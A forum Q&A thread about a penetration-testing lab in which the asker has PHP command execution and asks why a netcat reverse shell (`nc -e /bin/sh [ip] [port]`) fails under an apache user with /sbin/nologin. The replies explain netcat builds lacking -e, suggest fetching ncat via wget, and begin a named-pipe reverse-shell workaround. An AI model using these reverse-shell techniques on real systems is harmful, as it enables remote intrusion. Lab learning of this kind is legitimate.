# Does having /sbin/nologin mean I cannot start the /bin/sh executable?

Tags: php, penetration-test, exploit, shellcode, bash

While practicing exploitation on a lab, I managed to get the ability to execute php code which allowed me to execute system commands through shell_exec on a web server. The apache user has `/sbin/nologin` assigned as its shell.
I have tried using the command `nc -e /bin/sh [ip] [port]` but it fails. Using netcat without starting a shell, however, succeeds. I assumed that this was because having the shell set to `/no/login` means I cannot start it. However, if I use an executable that performs `execve("/bin/sh")` such as those found in msfvenom payload executables, it succeeds.

Another reason I assumed the `nologin` shell disallows a user to start an interactive shell is because trying the netcat reverse shell with a user who has `/bin/sh` configured as its shell succeeds. I am confused what phase checking for permissions to start a shell begins because I am still able to start it through binary executables.

Comment: /sbin/nologin forbids console/ssh logins, but if you get access through an exploit, you can still run /bin/sh. It may be that nc on this box doesn't allow -e. There is a tty trick to do it anyway (can't find it just now). Alternatively, use wget to fetch a ncat static binary from your own web server.

Answer (score 0, accepted):

Most probably, your problem has nothing to do with the login shell. Having a version of nc that supports the -e option is a great exception. Most netcats don't support -e.
[This article](https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem) explains what you have to do in this case. You have to split the shell creation into 2 parts, first you create a pipe with

```
mknod /tmp/mypipe p
```

and then you create the shell by redirecting stdin and stdout to the pipe and thereby to nc.